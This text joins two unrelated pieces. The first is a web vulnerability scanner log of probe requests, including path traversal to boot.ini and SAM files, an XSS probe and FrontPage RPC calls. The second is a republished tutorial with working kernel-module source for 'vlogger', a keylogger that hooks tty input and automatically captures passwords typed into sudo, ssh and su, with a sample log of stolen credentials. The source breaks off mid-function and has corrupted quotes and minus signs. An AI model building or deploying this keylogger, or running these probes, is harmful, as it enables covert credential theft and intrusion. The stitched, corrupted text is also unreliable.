GET***/scripts/tools/dsnform***200
GET***/scripts/tools/dsnform.exe***200
GET***/scripts/tools/getdrvrs.exe***200
GET***/scripts/tools/getdrvs.exe***200
GET***/scripts/tools/mkilog.exe***200
GET***/scripts/tools/newdsn.exe***200
GET***/scripts/tools/uploadn.asp***200
GET***/scripts/tools/uploadx.asp***200
GET***/scripts/upload.asp***200
GET***/scripts/uploadn.asp***200
GET***/scripts/uploadx.asp***200
GET***/scripts/visadmin.exe***200
GET***/scripts/visitor.exe***200
GET***/scripts/wa.exe***200
GET***/scripts/webbbs.exe***200
GET***/scripts/wguest.exe***200
GET***/scripts/ws_ftp.ini***200
GET***/scripts/wsisa.dll***200
GET***/search***200
GET***/search.asp?Search=>&lt;script&gt;alert()&lt;/script&gt;***200
GET***/search.dll***200
GET***/search/SQLQHit.asp***200
GET***/search/htx/SQLQHit.asp***200
GET***/search/htx/sqlqhit.asp***200
GET***/search/sqlqhit.asp***200
GET***/search97.vts***200
GET***/secure/.htaccess***200
GET***/secure/.wwwacl***200
GET***/server-info***200
GET***/server-status***200
GET***/servlet/SessionServlet***200
GET***/servlet/com.newatlanta.servletexec.JSP10Servlet/***200
GET***/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa***200
GET***/session/adminlogin***200
GET***/showfile.asp***200
GET***/siteseed/***200
GET***/siteserver/publishing/viewcode.asp?source=/default.asp***200
GET***/smdata.dat***200
GET***/smg_Smxcfg30.exe?vcc=3560121183d3***200
GET***/sqlqhit.asp***200
GET***/srchadm***200
GET***/ssi/envout.bat***200
GET***/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\***200
GET***/today.nsf***200
GET***/trace.axd***200
GET***/tree.dat***200
GET***/tsweb***200
GET***/tvcs/getservers.exe?action=selects1***200
GET***/upload.asp***200
GET***/uploadn.asp***200
GET***/uploadx.asp***200
GET***/user.dat***200
GET***/user.log***200
GET***/users/scripts/submit.cgi***200
GET***/wa.exe***200
GET***/whatever.htr***200
GET***/whisker.htr***200
GET***/whisker.htw***200
GET***/whisker.ida***200
GET***/whisker.idc***200
GET***/whisker.idq***200
GET***/ws_ftp.ini***200
GET***/wwwboard.pl***200
GET***/wwwboard/passwd.txt***200
GET***_vti_bin/_vti_aut/fp30reg.dll***500
HEAD***/…………………/config.sys***200
HEAD***/………………../boot.ini***200
HEAD***/………………./boot.ini***200
HEAD***/………………/boot.ini***200
HEAD***/……………../boot.ini***200
HEAD***/……………./boot.ini***200
HEAD***/……………/boot.ini***200
HEAD***/…………../boot.ini***200
HEAD***/…………./boot.ini***200
HEAD***/…………/boot.ini***200
HEAD***/………../boot.ini***200
HEAD***/………./boot.ini***200
HEAD***/………/boot.ini***200
HEAD***/……../boot.ini***200
HEAD***/……./boot.ini***200
HEAD***/……/boot.ini***200
HEAD***/…../boot.ini***200
HEAD***/…./Windows/Admin.pwl***200
HEAD***/…./Windows/Admin.pwl***403
HEAD***/…./boot.ini***200
HEAD***/…/boot.ini***200
HEAD***/../../../../../../../../boot.ini^webserver***200
HEAD***/../../../../../../../boot.ini^webserver***200
HEAD***/../../../../../../boot.ini^webserver***200
HEAD***/../../../../../boot.ini^webserver***200
HEAD***/../../../../../winnt/repair/sam._^webserver***200
HEAD***/../../../../boot.ini^webserver***200
HEAD***/../../../boot.ini^webserver***200
HEAD***/../../boot.ini^webserver***200
HEAD***/../../winnt/win.ini^webserver***200
HEAD***/../boot.ini***200
HEAD***/..\..\..\..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\winnt\repair\sam._^webserver***200
HEAD***/..\..\autoexec.bat^webserver***200
HEAD***/AdvWorks/equipment/catalog_type.asp***200
HEAD***/AdvWorks/equipment/catalog_type.asp***403
HEAD***/Scripts***200
HEAD***/Scripts***403
HEAD***/Scripts/samples***200
HEAD***/Scripts/samples***403
HEAD***/Scripts/tools***200
HEAD***/Scripts/tools***403
HEAD***/\../boot.ini^webserver***200
HEAD***/\../config.sys^webserver***200
HEAD***/\../readme.txt^webserver***200
HEAD***/_private***200
HEAD***/_private***403
HEAD***/_vti_adm/admin.dll***200
HEAD***/_vti_adm/admin.dll***403
HEAD***/_vti_bin***200
HEAD***/_vti_bin***403
HEAD***/_vti_bin/_vti_adm***200
HEAD***/_vti_bin/_vti_adm***403
HEAD***/_vti_bin/_vti_aut***200
HEAD***/_vti_bin/_vti_aut***403
HEAD***/_vti_bin/_vti_aut/author.dll***200
HEAD***/_vti_bin/_vti_aut/author.dll***403
HEAD***/_vti_bin/_vti_aut/dvwssr.dll***200
HEAD***/_vti_bin/_vti_aut/dvwssr.dll***401
HEAD***/_vti_bin/_vti_aut/dvwssr.dll***500
HEAD***/_vti_bin/shtml.dll/_vti_rpc***200
HEAD***/_vti_bin/shtml.dll/_vti_rpc***403
HEAD***/_vti_log***200
HEAD***/_vti_log***403
HEAD***/_vti_pvt***200
HEAD***/_vti_pvt***403
HEAD***/_vti_txt***200
HEAD***/_vti_txt***403
HEAD***/admisapi/***200
HEAD***/admisapi/***403
HEAD***/cgi-bin/***200
HEAD***/cgi-bin/***403
HEAD***/cgi-bin/^webserver***200
HEAD***/cgi-bin/_vti_cnf***200
HEAD***/cgi-bin/_vti_cnf***403
HEAD***/cgi-bin/visitor.exe***200
HEAD***/cgi-bin/visitor.exe***403
HEAD***/cgi-win/wincgi.bat***200
HEAD***/cgi-win/wincgi.bat***403
HEAD***/cgi/^webserver***200
HEAD***/iisadmin***200
HEAD***/iisadmin***403
HEAD***/iisamples/Sdk***200
HEAD***/iisamples/Sdk***403
HEAD***/iissamples***200
HEAD***/iissamples***403
HEAD***/iissamples/Default***200
HEAD***/iissamples/Default***403
HEAD***/iissamples/ExAir***200
HEAD***/iissamples/ExAir***403
HEAD***/iissamples/ISSamples***200
HEAD***/iissamples/ISSamples***403
HEAD***/msadc/samples/adctest.asp***200
HEAD***/msadc/samples/adctest.asp***403
HEAD***/nofile.pl^webserver***200
HEAD***/scripts/../../cmd.exe***200
HEAD***/scripts/../../cmd.exe***403
HEAD***/scripts/Fpadmcgi.exe***200
HEAD***/scripts/Fpadmcgi.exe***403
HEAD***/scripts/IISADMPWD***200
HEAD***/scripts/IISADMPWD***403
HEAD***/scripts/convert.bas***200
HEAD***/scripts/convert.bas***403
HEAD***/scripts/cpshost.dll***200
HEAD***/scripts/cpshost.dll***403
HEAD***/scripts/iisadmin***200
HEAD***/scripts/iisadmin***403
HEAD***/scripts/iisadmin/default.htm***200
HEAD***/scripts/iisadmin/default.htm***403
HEAD***/scripts/iisadmin/samples***200
HEAD***/scripts/iisadmin/samples***403
HEAD***/scripts/iisadmin/tools***200
HEAD***/scripts/iisadmin/tools***403
HEAD***/scripts/perl***200
HEAD***/scripts/perl***403
HEAD***/scripts/proxy/w3proxy.dll***200
HEAD***/scripts/proxy/w3proxy.dll***403
HEAD***/srchadm***200
HEAD***/srchadm***403
POST***/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false***200
POST***/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false***200
POST***/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611***200
POST***/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611***200
TRACK***/***200

Linux Kernel Keylogger

March 3, 2007

–[ Contents

1 - Introduction

2 - How Linux keyboard driver work

3 - Kernel based keylogger approaches
3.1 - Interrupt handler
3.2 - Function hijacking
3.2.1 - handle_scancode
3.2.2 - put_queue
3.2.3 - receive_buf
3.2.4 - tty_read
3.2.5 - sys_read/sys_write

4 - vlogger
4.1 - The syscall/tty approach
4.2 - Features
4.3 - How to use

5 - Greets

6 - Keylogger source

--[ 1 - Introduction

This article is divided into two parts.  The first part of the paper
gives an overview on how the linux keyboard driver work, and discusses
methods that can be used to create a kernel based keylogger. This part
will be useful for those who want to write a kernel based keylogger, or to
write their own keyboard driver (for supporting input of non-supported
language in linux environment, ...) or to program taking advantage of many
features in the Linux keyboard driver.

The second part presents detail of vlogger, a smart kernel based linux
keylogger, and how to use it.  Keylogger is a very interesting code being
used widely in honeypots, hacked systems, ... by white and black hats. As
most of us known, besides user space keyloggers (such as iob, uberkey,
unixkeylogger, ...), there are some kernel based keyloggers. The earliest
kernel based keylogger is linspy of halflife which was published in Phrack
50 (see [4]).  And the recent kkeylogger is presented in ‘Kernel Based
Keylogger’ paper by mercenary (see [7]) that I found when was writing this
paper. The common method of those kernel based keyloggers using is to log
user keystrokes by intercepting sys_read or sys_write system call.
However, this approach is quite unstable and slowing down the whole system
noticeably because sys_read (or sys_write) is the generic read/write
function of the system; sys_read is called whenever a process wants to read
something from devices (such as keyboard, file, serial port, …). In
vlogger, I used a better way to implement it that hijacks the tty buffer
processing function.

The reader is supposed to possess the knowledge on Linux Loadable Kernel
Module.  Articles [1] and [2] are recommended to read before further
reading.

–[ 2 - How Linux keyboard driver work

First, when you press a key on the keyboard, the keyboard will send
corresponding scancodes to keyboard driver.  A single key press can produce
a sequence of up to six scancodes.

The handle_scancode() function in the keyboard driver parses the stream
of scancodes and converts it into a series of key press and key release
events called keycode by using a translation-table via kbd_translate()
function.  Each key is provided with a unique keycode k in the range 1-127.
Pressing key k produces keycode k, while releasing it produces keycode
k+128.

For example, keycode of 'a' is 30. Pressing key 'a' produces keycode 30.
Releasing 'a' produces keycode 158 (128+30).

Next, keycodes are converted to key symbols by looking them up on the
appropriate keymap.  This is a quite complex process. There are eight
possible modifiers (shift keys - Shift , AltGr, Control, Alt, ShiftL,
ShiftR, CtrlL and CtrlR), and the combination of currently active modifiers
and locks determines the keymap used.

After the above handling, the obtained characters are put into the raw
tty queue - tty_flip_buffer.

In the tty line discipline, receive_buf() function is called periodically
to get characters from tty_flip_buffer then put them into tty read queue.

When user process want to get user input, it calls read() function on
stdin of the process. sys_read() function will calls read() function
defined in file_operations structure (which is pointed to tty_read) of
corresponding tty (ex /dev/tty0) to read input characters and return to the
process.

The keyboard driver can be in one of 4 modes:
- scancode (RAW MODE): the application gets scancodes for input.
It is used by applications that implement their own keyboard
driver (ex: X11)

- keycode (MEDIUMRAW MODE): the application gets information on
which keys (identified by their keycodes) get pressed and
released.

- ASCII (XLATE MODE): the application effectively gets the
characters as defined by the keymap, using an 8-bit encoding.

- Unicode (UNICODE MODE): this mode only differs from the ASCII
mode by allowing the user to compose UTF8 unicode characters by
their decimal value, using Ascii_0 to Ascii_9, or their
hexadecimal (4-digit) value, using Hex_0 to Hex_9. A keymap can
be set up to produce UTF8 sequences (with a U+XXXX pseudo-symbol,
where each X is an hexadecimal digit).

Those modes influence what type of data that applications will get as
keyboard input.  For more details on scancode, keycode and keymaps, please
read [3].

–[ 3 - Kernel based keylogger approaches

We can implement a kernel based keylogger in two ways by writing our own
keyboard interrupt handler or hijacking one of input processing functions.

----[ 3.1 - Interrupt handler

To log keystrokes, we will use our own keyboard interrupt handler. Under
Intel architectures, the IRQ of the keyboard controlled is IRQ 1.  When
receives a keyboard interrupt, our own keyboard interrupt handler read the
scancode and keyboard status.  Keyboard events can be read and written via
port 0x60(Keyboard data register) and 0x64(Keyboard status register).

/* below code is intel specific */
#define KEYBOARD_IRQ 1
#define KBD_STATUS_REG 0x64
#define KBD_CNTL_REG 0x64
#define KBD_DATA_REG 0x60

#define kbd_read_input() inb(KBD_DATA_REG)
#define kbd_read_status() inb(KBD_STATUS_REG)
#define kbd_write_output(val) outb(val, KBD_DATA_REG)
#define kbd_write_command(val) outb(val, KBD_CNTL_REG)

/* register our own IRQ handler */
request_irq(KEYBOARD_IRQ, my_keyboard_irq_handler, 0, "my keyboard", NULL);

In my_keyboard_irq_handler():
scancode = kbd_read_input();
key_status = kbd_read_status();
log_scancode(scancode);

This method is platform dependent. So it won't be portable among
platforms. And you have to be very careful with your interrupt handler if
you don't want to crash your box ;)

----[ 3.2 - Function hijacking

Based on the Figure 1, we can implement our keylogger to log user inputs
by hijacking one of handle_scancode(), put_queue(), receive_buf(),
tty_read() and sys_read() functions. Note that we can't intercept
tty_insert_flip_char() function because it is an INLINE function.

------[ 3.2.1 - handle_scancode

This is the entry function of the keyboard driver (see keyboard.c).  It
handles scancodes which are received from keyboard.

# /usr/src/linux/drives/char/keyboard.c
void handle_scancode(unsigned char scancode, int down);

We can replace original handle_scancode() function with our own to logs
all scancodes. But handle_scancode() function is not a global and exported
function.  So to do this, we can use kernel function hijacking technique
introduced by Silvio (see [5]).

/* below is a code snippet written by Plasmoid */
static struct semaphore hs_sem, log_sem;
static int logging=1;

#define CODESIZE 7
static char hs_code[CODESIZE];
static char hs_jump[CODESIZE] =
“\xb8\x00\x00\x00\x00″      /*      movl  $0,%eax  */
“\xff\xe0″                  /*      jmp   *%eax    */
;

void (*handle_scancode) (unsigned char, int) =
(void (*)(unsigned char, int)) HS_ADDRESS;

void _handle_scancode(unsigned char scancode, int keydown)
{
if (logging && keydown)
log_scancode(scancode, LOGFILE);

/*
* Restore first bytes of the original handle_scancode code.  Call
* the restored function and re-restore the jump code.  Code is
* protected by semaphore hs_sem, we only want one CPU in here at a
* time.
*/
down(&hs_sem);

memcpy(handle_scancode, hs_code, CODESIZE);
handle_scancode(scancode, keydown);
memcpy(handle_scancode, hs_jump, CODESIZE);

up(&hs_sem);
}

HS_ADDRESS is set by the Makefile executing this command
HS_ADDRESS=0x$(word 1,$(shell ksyms -a | grep handle_scancode))

Similar to method presented in 3.1, the advantage of this method is the
ability to log keystrokes under X and the console, no matter if a tty is
invoked or not.  And you will know exactly what key is pressed on the
keyboard (including special keys such as Control, Alt, Shift, Print Screen,
…).  But this method is platform dependent and won’t be portable among
platforms. This method also can’t log keystroke of remote sessions and is
quite complex for building an advance logger.

——[ 3.2.2 - put_queue

This function is called by handle_scancode() function to put characters
into tty_queue.

# /usr/src/linux/drives/char/keyboard.c
void put_queue(int ch);

To intercept this function, we can use the above technique as in section
(3.2.1).

------[ 3.2.3 - receive_buf

receive_buf() function is called by the low-level tty driver to send
characters received by the hardware to the line discipline for processing.

# /usr/src/linux/drivers/char/n_tty.c */
static void n_tty_receive_buf(struct tty_struct *tty, const
unsigned char *cp, char *fp, int count)

cp is a pointer to the buffer of input character received by the device.
fp is a pointer to a pointer of flag bytes which indicate whether a
character was received with a parity error, etc.

Lets take a deeper look into tty structures

# /usr/include/linux/tty.h
struct tty_struct {
intmagic;
struct tty_driver driver;
struct tty_ldisc ldisc;
struct termios *termios, *termios_locked;
...
}

# /usr/include/linux/tty_ldisc.h
struct tty_ldisc {
intmagic;
char*name;
...
void(*receive_buf)(struct tty_struct *,
const unsigned char *cp, char *fp, int count);
int(*receive_room)(struct tty_struct *);
void(*write_wakeup)(struct tty_struct *);
};

To intercept this function, we can save the original tty receive_buf()
function then set ldisc.receive_buf to our own new_receive_buf() function
in order to logging user inputs.

Ex: to log inputs on the tty0

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
struct tty_struct *tty = file->private_data;
old_receive_buf = tty->ldisc.receive_buf;
tty->ldisc.receive_buf = new_receive_buf;

void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
logging(tty, cp, count); //log inputs

/* call the original receive_buf */
(*old_receive_buf)(tty, cp, fp, count);
}

------[ 3.2.4 - tty_read

This function is called when a process wants to read input characters
from a tty via sys_read() function.

# /usr/src/linux/drives/char/tty_io.c
static ssize_t tty_read(struct file * file, char * buf, size_t count,
loff_t *ppos)

static struct file_operations tty_fops = {
llseek:tty_lseek,
read:tty_read,
write:tty_write,
poll:tty_poll,
ioctl:tty_ioctl,
open:tty_open,
release:tty_release,
fasync:tty_fasync,
};

To log inputs on the tty0:

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
old_tty_read = file->f_op->read;
file->f_op->read = new_tty_read;

------[ 3.2.5 - sys_read/sys_write

We will intercept sys_read/sys_write system calls to redirect it to our
own code which logs the content of the read/write calls. This method was
presented by halflife in Phrack 50 (see [4]).  I highly recommend reading
that paper and a great article written by pragmatic called “Complete Linux
Loadable Kernel Modules” (see [2]).

The code to intercept sys_read/sys_write will be something like this:

extern void *sys_call_table[];
original_sys_read = sys_call_table[__NR_read];
sys_call_table[__NR_read] = new_sys_read;

–[ 4 - vlogger

This part will introduce my kernel keylogger which is used method
described in section 3.2.3 to acquire more abilities than common keyloggers
used sys_read/sys_write systemcall replacement approach. I have tested the
code with the following versions of linux kernel: 2.4.5, 2.4.7, 2.4.17 and
2.4.18.

----[ 4.1 - The syscall/tty approach

To logging both local (logged from console) and remote sessions, I chose
the method of intercepting receive_buf() function (see 3.2.3).

In the kernel, tty_struct and tty_queue structures are dynamically
allocated only when the tty is open. Thus, we also have to intercept
sys_open syscall to dynamically hooking the receive_buf() function of each
tty or pty when it's invoked.

// to intercept open syscall
original_sys_open = sys_call_table[__NR_open];
sys_call_table[__NR_open] = new_sys_open;

// new_sys_open()
asmlinkage int new_sys_open(const char *filename, int flags, int mode)
{

// call the original_sys_open
ret = (*original_sys_open)(filename, flags, mode);

if (ret >= 0) {
struct tty_struct * tty;

file = fget(ret);
tty = file->private_data;
if (tty != NULL &&

tty->ldisc.receive_buf != new_receive_buf) {

// save the old receive_buf
old_receive_buf = tty->ldisc.receive_buf;

/*
* init to intercept receive_buf of this tty
* tty->ldisc.receive_buf = new_receive_buf;
*/
init_tty(tty, TTY_INDEX(tty));
}

}

// our new receive_buf() function
void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
if (!tty->real_raw && !tty->raw)// ignore raw mode
// call our logging function to log user inputs
vlogger_process(tty, cp, count);
// call the original receive_buf
(*old_receive_buf)(tty, cp, fp, count);
}

—-[ 4.2 - Features

- Logs both local and remote sessions (via tty & pts)

- Separate logging for each tty/session. Each tty has their own logging
buffer.

- Nearly support all special chars such as arrow keys (left, right, up,
down), F1 to F12, Shift+F1 to Shift+F12, Tab, Insert, Delete, End,
Home, Page Up, Page Down, BackSpace, ...

- Support some line editing keys included CTRL-U and BackSpace.

- Timestamps logging, timezone supported (ripped off some codes from
libc).

- Multiple logging modes

o dumb mode: logs all keystrokes

o smart mode: detects password prompt automatically to log
user/password only.  I used the similar technique presented in
"Passive Analysis of SSH (Secure Shell) Traffic" paper by Solar
Designer and Dug Song (see [6]). When the application turns input
echoing off, we assume that it is for entering a password.

o normal mode: disable logging

You can switch between logging modes by using a magic password.

#define VK_TOGLE_CHAR29// CTRL-]
#define MAGIC_PASS”31337″// to switch mode, type MAGIC_PASS
// then press VK_TOGLE_CHAR key

—-[ 4.3 - How to use

Change the following options

// directory to store log files
#define LOG_DIR "/tmp/log"

// your local timezone
#define TIMEZONE7*60*60// GMT+7

// your magic password
#define MAGIC_PASS"31337"

Below is how the log file looks like:

[root@localhost log]# ls -l
total 60
-rw——-   1 root     root          633 Jun 19 20:59 pass.log
-rw——-   1 root     root        37593 Jun 19 18:51 pts11
-rw——-   1 root     root          56 Jun 19 19:00 pts20
-rw——-   1 root     root          746 Jun 19 20:06 pts26
-rw——-   1 root     root          116 Jun 19 19:57 pts29
-rw——-   1 root     root        3219 Jun 19 21:30 tty1
-rw——-   1 root     root        18028 Jun 19 20:54 tty2

—in dumb mode
[root@localhost log]# head tty2// local session
<19/06/2002-20:53:47 uid=501 bash> pwd
<19/06/2002-20:53:51 uid=501 bash> uname -a
<19/06/2002-20:53:53 uid=501 bash> lsmod
<19/06/2002-20:53:56 uid=501 bash> pwd
<19/06/2002-20:54:05 uid=501 bash> cd /var/log
<19/06/2002-20:54:13 uid=501 bash> tail messages
<19/06/2002-20:54:21 uid=501 bash> cd ~
<19/06/2002-20:54:22 uid=501 bash> ls
<19/06/2002-20:54:29 uid=501 bash> tty
<19/06/2002-20:54:29 uid=501 bash> [UP]

[root@localhost log]# tail pts11// remote session
<19/06/2002-18:48:27 uid=0 bash> cd new
<19/06/2002-18:48:28 uid=0 bash> cp -p ~/code .
<19/06/2002-18:48:21 uid=0 bash> lsmod
<19/06/2002-18:48:27 uid=0 bash> cd /va[TAB][^H][^H]tmp/log/
<19/06/2002-18:48:28 uid=0 bash> ls -l
<19/06/2002-18:48:30 uid=0 bash> tail pts11
<19/06/2002-18:48:38 uid=0 bash> [UP] | more
<19/06/2002-18:50:44 uid=0 bash> vi vlogertxt
<19/06/2002-18:50:48 uid=0 vi> :q
<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger

—in smart mode
[root@localhost log]# cat pass.log
[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]
USER/CMD sudo traceroute yahoo.com
PASS 5hgt6d
PASS

[19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]
USER/CMD ssh guest@host.com
PASS guest

[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]
USER/CMD open ftp.ilog.fr
USER Anonymous
PASS heh@heh

[19/06/2002-20:59:54 tty=pts/29 uid=504 su]
USER/CMD su -
PASS asdf1234

Please check http://www.thehackerschoice.com/ for update on the new version
of this tool.

–[ 5 - Greets

M.A.B. greets you, thanks for reading this document.

--[ 6 - Keylogger sources

<++> vlogger/Makefile
#
#  vlogger 1.0 by rd
#
#  LOCAL_ONLYlogging local session only. Doesn't intercept
#sys_open system call
#  DEBUGEnable debug. Turn on this options will slow
#down your system
#

KERNELDIR =/usr/src/linux
include $(KERNELDIR)/.config
MODVERFILE = $(KERNELDIR)/include/linux/modversions.h

MODDEFS = -D__KERNEL__ -DMODULE -DMODVERSIONS
CFLAGS = -Wall -O2 -I$(KERNELDIR)/include -include $(MODVERFILE) \
-Wstrict-prototypes -fomit-frame-pointer -pipe \
-fno-strength-reduce -malign-loops=2 -malign-jumps=2 \
-malign-functions=2

all : vlogger.o

vlogger.o: vlogger.c
$(CC) $(CFLAGS) $(MODDEFS) -c $^ -o $@

clean:
rm -f *.o
<-->
<++> vlogger/vlogger.c
/*
* vlogger 1.0
*
* Copyright (C) 2002 rd <rd@vnsecurity.net>
*
* Please check http://www.thehackerschoice.com/ for update
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* Greets to THC & vnsecurity
*
*/

#define __KERNEL_SYSCALLS__
#include <linux/version.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/smp_lock.h>
#include <linux/sched.h>
#include <linux/unistd.h>
#include <linux/string.h>
#include <linux/file.h>
#include <asm/uaccess.h>
#include <linux/proc_fs.h>
#include <asm/errno.h>
#include <asm/io.h>

#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
MODULE_LICENSE("GPL");
MODULE_AUTHOR("rd@vnsecurity.net");
#endif

#define MODULE_NAME "vlogger "
#define MVERSION "vlogger 1.0 - by rd@vnsecurity.net\n"

#ifdef DEBUG
#define DPRINT(format, args...) printk(MODULE_NAME format, ##args)
#else
#define DPRINT(format, args...)
#endif

#define N_TTY_NAME "tty"
#define N_PTS_NAME "pts"
#define MAX_TTY_CON 8
#define MAX_PTS_CON 256
#define LOG_DIR "/tmp/log"
#define PASS_LOG LOG_DIR "/pass.log"

#define TIMEZONE 7*60*60// GMT+7

#define ESC_CHAR 27
#define BACK_SPACE_CHAR1 127// local
#define BACK_SPACE_CHAR2 8// remote

#define VK_TOGLE_CHAR 29// CTRL-]
#define MAGIC_PASS “31337″ // to switch mode, press MAGIC_PASS and
// VK_TOGLE_CHAR

#defineVK_NORMAL 0
#defineVK_DUMBMODE 1
#defineVK_SMARTMODE 2
#define DEFAULT_MODE VK_DUMBMODE

#define MAX_BUFFER 256
#define MAX_SPECIAL_CHAR_SZ 12

#define TTY_NUMBER(tty) MINOR((tty)->device) – (tty)->driver.minor_start \
+ (tty)->driver.name_base
#define TTY_INDEX(tty) tty->driver.type == \
TTY_DRIVER_TYPE_PTY?MAX_TTY_CON + \
TTY_NUMBER(tty):TTY_NUMBER(tty)
#define IS_PASSWD(tty) L_ICANON(tty) && !L_ECHO(tty)
#define TTY_WRITE(tty, buf, count) (*tty->driver.write)(tty, 0, \
buf, count)

#define TTY_NAME(tty) (tty->driver.type == \
TTY_DRIVER_TYPE_CONSOLE?N_TTY_NAME: \
tty->driver.type == TTY_DRIVER_TYPE_PTY && \
tty->driver.subtype == PTY_TYPE_SLAVE?N_PTS_NAME:””)

#define BEGIN_KMEM { mm_segment_t old_fs = get_fs(); set_fs(get_ds());
#define END_KMEM set_fs(old_fs); }

extern void *sys_call_table[];
int errno;

struct tlogger {
struct tty_struct *tty;
char buf[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ];
int lastpos;
int status;
int pass;
};

struct tlogger *ttys[MAX_TTY_CON + MAX_PTS_CON] = { NULL };
void (*old_receive_buf)(struct tty_struct *, const unsigned char *,
char *, int);
asmlinkage int (*original_sys_open)(const char *, int, int);

int vlogger_mode = DEFAULT_MODE;

/* Prototypes */
static inline void init_tty(struct tty_struct *, int);

/*
static char *_tty_make_name(struct tty_struct *tty,
const char *name, char *buf)
{
int idx = (tty)?MINOR(tty->device) – tty->driver.minor_start:0;

if (!tty)
strcpy(buf, “NULL tty”);
else
sprintf(buf, name,
idx + tty->driver.name_base);
return buf;
}

char *tty_name(struct tty_struct *tty, char *buf)
{
return _tty_make_name(tty, (tty)?tty->driver.name:NULL, buf);
}
*/

#define SECS_PER_HOUR  (60 * 60)
#define SECS_PER_DAY   (SECS_PER_HOUR * 24)
#define isleap(year) \
((year) % 4 == 0 && ((year) % 100 != 0 || (year) % 400 == 0))
#define DIV(a, b) ((a) / (b) – ((a) % (b) < 0))
#define LEAPS_THRU_END_OF(y) (DIV (y, 4) – DIV (y, 100) + DIV (y, 400))

struct vtm {
int tm_sec;
int tm_min;
int tm_hour;
int tm_mday;
int tm_mon;
int tm_year;
};

/*
* Convert from epoch to date
*/

int epoch2time (const time_t *t, long int offset, struct vtm *tp)
{
static const unsigned short int mon_yday[2][13] = {
/* Normal years.  */
{ 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365 },
/* Leap years.  */
{ 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366 }
};

long int days, rem, y;
const unsigned short int *ip;

days = *t / SECS_PER_DAY;
rem = *t % SECS_PER_DAY;
rem += offset;
while (rem < 0) {
rem += SECS_PER_DAY;
–days;
}
while (rem >= SECS_PER_DAY) {
rem -= SECS_PER_DAY;
++days;
}
tp->tm_hour = rem / SECS_PER_HOUR;
rem %= SECS_PER_HOUR;
tp->tm_min = rem / 60;
tp->tm_sec = rem % 60;
y = 1970;

while (days < 0 || days >= (isleap (y) ? 366 : 365)) {
long int yg = y + days / 365 – (days % 365 < 0);
days -= ((yg – y) * 365
+ LEAPS_THRU_END_OF (yg – 1)
- LEAPS_THRU_END_OF (y – 1));
y = yg;
}
tp->tm_year = y – 1900;
if (tp->tm_year != y – 1900)
return 0;
ip = mon_yday[isleap(y)];
for (y = 11; days < (long int) ip[y]; –y)
continue;
days -= ip[y];
tp->tm_mon = y;
tp->tm_mday = days + 1;
return 1;
}

/*
* Get current date & time
*/

void get_time (char *date_time)
{
struct timeval tv;
time_t t;
struct vtm tm;

do_gettimeofday(&tv);
t = (time_t)tv.tv_sec;

epoch2time(&t, TIMEZONE, &tm);

sprintf(date_time, “%.2d/%.2d/%d-%.2d:%.2d:%.2d”, tm.tm_mday,
tm.tm_mon + 1, tm.tm_year + 1900, tm.tm_hour, tm.tm_min,
tm.tm_sec);
}

/*
* Get task structure from pgrp id
*/

inline struct task_struct *get_task(pid_t pgrp)
{
struct task_struct *task = current;

do {
if (task->pgrp == pgrp) {
return task;
}
task = task->next_task;
} while (task != current);
return NULL;
}

#define _write(f, buf, sz) (f->f_op->write(f, buf, sz, &f->f_pos))
#define WRITABLE(f) (f->f_op && f->f_op->write)

int write_to_file(char *logfile, char *buf, int size)
{
int ret = 0;
struct file  *f = NULL;

lock_kernel();
BEGIN_KMEM;
f = filp_open(logfile, O_CREAT|O_APPEND, 00600);

if (IS_ERR(f)) {
DPRINT(“Error %ld opening %s\n”, -PTR_ERR(f), logfile);
ret = -1;
} else {
if (WRITABLE(f))
_write(f, buf, size);
else {
DPRINT(“%s does not have a write method\n”,
logfile);
ret = -1;
}

if ((ret = filp_close(f,NULL)))
DPRINT(“Error %d closing %s\n”, -ret, logfile);
}
END_KMEM;
unlock_kernel();

return ret;
}

#define BEGIN_ROOT { int saved_fsuid = current->fsuid; current->fsuid = 0;
#define END_ROOT current->fsuid = saved_fsuid; }

/*
* Logging keystrokes
*/

void logging(struct tty_struct *tty, struct tlogger *tmp, int cont)
{
int i;

char logfile[256];
char loginfo[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ + 256];
char date_time[24];
struct task_struct *task;

if (vlogger_mode == VK_NORMAL)
return;

if ((vlogger_mode == VK_SMARTMODE) && (!tmp->lastpos || cont))
return;

task = get_task(tty->pgrp);

